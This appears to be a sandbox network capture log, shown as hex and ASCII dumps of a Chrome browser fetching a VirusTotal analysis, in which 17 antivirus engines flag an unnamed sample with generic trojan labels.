                                                                                                                                                                                                                    2024-04-25 19:55:53 UTC523INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 4d 6a 67 79 5a 47 45 77 4d 6a 41 33 4f 54 68 68 5a 6d 4a 6b 4e 32 56 6d 5a 6a 51 77 59 32 55 34 4e 54 52 6c 4f 47 51 77 4d 57 59 36 4d 54 63 78 4e 44 41 33 4e 44 6b 7a 4e 67 3d 3d 22 2c 0a 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 61 6e 61 6c 79 73 69 73 22 2c 0a 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 61 6e 61 6c 79 73 65 73 2f 4d 6a 67 79 5a 47 45 77 4d 6a 41 33 4f 54 68 68 5a 6d 4a 6b 4e 32 56 6d 5a 6a 51 77 59 32 55 34 4e 54 52 6c 4f 47 51 77 4d 57 59 36 4d 54 63 78 4e 44 41 33 4e 44
                                                                                                                                                                                                                    Data Ascii: { "data": { "id": "MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg==", "type": "analysis", "links": { "self": "https://www.virustotal.com/ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3ND
                                                                                                                                                                                                                    2024-04-25 19:55:53 UTC1408INData Raw: 20 20 20 20 20 20 20 22 6d 61 6c 69 63 69 6f 75 73 22 3a 20 31 37 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 75 73 70 69 63 69 6f 75 73 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 75 6e 64 65 74 65 63 74 65 64 22 3a 20 34 35 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 61 72 6d 6c 65 73 73 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 69 6d 65 6f 75 74 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 6f 6e 66 69 72 6d 65 64 2d 74 69 6d 65 6f 75 74 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 66 61 69 6c 75 72 65 22 3a 20 32 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 2d 75 6e 73 75 70 70 6f 72 74 65 64
                                                                                                                                                                                                                    Data Ascii: "malicious": 17, "suspicious": 0, "undetected": 45, "harmless": 0, "timeout": 0, "confirmed-timeout": 0, "failure": 2, "type-unsupported
                                                                                                                                                                                                                    2024-04-25 19:55:53 UTC547INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 32 2e 34 2e 32 30 32 32 2e 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 41 54 2d 51 75 69 63 6b 48 65 61 6c 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f
                                                                                                                                                                                                                    Data Ascii: "engine_version": "2.4.2022.1", "engine_update": "20240423", "category": "undetected", "result": null }, "CAT-QuickHeal": { "metho
                                                                                                                                                                                                                    2024-04-25 19:55:53 UTC1408INData Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 53 6b 79 68 69 67 68 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 76 32 30 32 31 2e 32 2e 30 2b 34 30 34 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 6d 61 6c 69 63 69 6f 75 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: { "method": "blacklist", "engine_name": "Skyhigh", "engine_version": "v2021.2.0+4045", "engine_update": "20240425", "category": "malicious",
                                                                                                                                                                                                                    2024-04-25 19:55:53 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 32 2e 32 33 2e 30 2e 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 72 6f 77 64 53 74 72 69 6b 65 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22
                                                                                                                                                                                                                    Data Ascii: "engine_version": "2.23.0.0", "engine_update": "20240423", "category": "undetected", "result": null }, "CrowdStrike": { "method": "
                                                                                                                                                                                                                    2024-04-25 19:55:53 UTC1280INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 41 72 63 61 62 69 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 41 72 63 61 62 69 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 32 30
                                                                                                                                                                                                                    Data Ascii: "category": "undetected", "result": null }, "Arcabit": { "method": "blacklist", "engine_name": "Arcabit", "engine_version": "20
                                                                                                                                                                                                                    2024-04-25 19:55:53 UTC1408INData Raw: 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 6d 61 6c 69 63 69 6f 75 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 54 72 6f 6a 61 6e 2e 47 65 6e 2e 4d 42 54 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 45 6c 61 73 74 69 63 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 45 6c
                                                                                                                                                                                                                    Data Ascii: "engine_update": "20240425", "category": "malicious", "result": "Trojan.Gen.MBT" }, "Elastic": { "method": "blacklist", "engine_name": "El
                                                                                                                                                                                                                    2024-04-25 19:55:53 UTC1408INData Raw: 20 22 6d 61 6c 69 63 69 6f 75 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 4f 74 68 65 72 3a 4d 61 6c 77 61 72 65 2d 67 65 6e 20 5b 54 72 6a 5d 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 79 6e 65 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 43 79 6e 65 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 34 2e 30 2e 31 2e 31 22 2c 0a 20 20 20
                                                                                                                                                                                                                    Data Ascii: "malicious", "result": "Other:Malware-gen [Trj]" }, "Cynet": { "method": "blacklist", "engine_name": "Cynet", "engine_version": "4.0.1.1",
                                                                                                                                                                                                                    2024-04-25 19:55:53 UTC1280INData Raw: 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 56 69 52 6f 62 6f 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 56 69 52 6f 62 6f 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 32 30 31 34 2e 33 2e 32 30 2e 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35
                                                                                                                                                                                                                    Data Ascii: "result": null }, "ViRobot": { "method": "blacklist", "engine_name": "ViRobot", "engine_version": "2014.3.20.0", "engine_update": "20240425
                                                                                                                                                                                                                    2024-04-25 19:55:53 UTC1408INData Raw: 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 42 61 69 64 75 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 42 61 69 64 75 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 2e 32 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 31 39 30 33 31 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: ult": null }, "Baidu": { "method": "blacklist", "engine_name": "Baidu", "engine_version": "1.0.0.2", "engine_update": "20190318",


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    199192.168.2.164995474.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:54 UTC549OUTGET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:54 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 60e15fc6ef7741ed074ba0454af7e921
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:54 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:54 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    200192.168.2.164995674.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC942OUTGET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTU4MTA2MDY2ODQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU0LjY1NQ==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC885INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 73c5373b3371a23ae8deeb52834ef648
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:56 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 25625
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:56 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC523INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 4d 6a 67 79 5a 47 45 77 4d 6a 41 33 4f 54 68 68 5a 6d 4a 6b 4e 32 56 6d 5a 6a 51 77 59 32 55 34 4e 54 52 6c 4f 47 51 77 4d 57 59 36 4d 54 63 78 4e 44 41 33 4e 44 6b 7a 4e 67 3d 3d 22 2c 0a 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 61 6e 61 6c 79 73 69 73 22 2c 0a 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 61 6e 61 6c 79 73 65 73 2f 4d 6a 67 79 5a 47 45 77 4d 6a 41 33 4f 54 68 68 5a 6d 4a 6b 4e 32 56 6d 5a 6a 51 77 59 32 55 34 4e 54 52 6c 4f 47 51 77 4d 57 59 36 4d 54 63 78 4e 44 41 33 4e 44
                                                                                                                                                                                                                    Data Ascii: { "data": { "id": "MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg==", "type": "analysis", "links": { "self": "https://www.virustotal.com/ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3ND
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC1408INData Raw: 20 20 20 22 73 75 73 70 69 63 69 6f 75 73 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 75 6e 64 65 74 65 63 74 65 64 22 3a 20 34 35 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 61 72 6d 6c 65 73 73 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 69 6d 65 6f 75 74 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 6f 6e 66 69 72 6d 65 64 2d 74 69 6d 65 6f 75 74 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 66 61 69 6c 75 72 65 22 3a 20 32 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 2d 75 6e 73 75 70 70 6f 72 74 65 64 22 3a 20 38 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 74 61 74
                                                                                                                                                                                                                    Data Ascii: "suspicious": 0, "undetected": 45, "harmless": 0, "timeout": 0, "confirmed-timeout": 0, "failure": 2, "type-unsupported": 8 }, "stat
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC544INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 32 2e 34 2e 32 30 32 32 2e 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 41 54 2d 51 75 69 63 6b 48 65 61 6c 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22
                                                                                                                                                                                                                    Data Ascii: "engine_version": "2.4.2022.1", "engine_update": "20240423", "category": "undetected", "result": null }, "CAT-QuickHeal": { "
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC1408INData Raw: 79 68 69 67 68 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 53 6b 79 68 69 67 68 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 76 32 30 32 31 2e 32 2e 30 2b 34 30 34 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 6d 61 6c 69 63 69 6f 75 73 22 2c 0a 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: yhigh": { "method": "blacklist", "engine_name": "Skyhigh", "engine_version": "v2021.2.0+4045", "engine_update": "20240425", "category": "malicious",
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC1408INData Raw: 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 32 2e 32 33 2e 30 2e 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 72 6f 77 64 53 74 72 69 6b 65 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: ne_version": "2.23.0.0", "engine_update": "20240423", "category": "undetected", "result": null }, "CrowdStrike": { "method": "blacklist",
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC1408INData Raw: 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 42 69 74 44 65 66 65 6e 64 65 72 54 68 65 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 42 69 74 44 65 66 65 6e 64 65 72 54 68 65 74 61 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72
                                                                                                                                                                                                                    Data Ascii: "category": "undetected", "result": null }, "BitDefenderTheta": { "method": "blacklist", "engine_name": "BitDefenderTheta", "engine_ver
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC1408INData Raw: 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 45 53 45 54 2d 4e 4f 44 33 32 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 32 39 31 32 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 6d 61 6c 69 63 69 6f 75 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: { "method": "blacklist", "engine_name": "ESET-NOD32", "engine_version": "29124", "engine_update": "20240425", "category": "malicious",
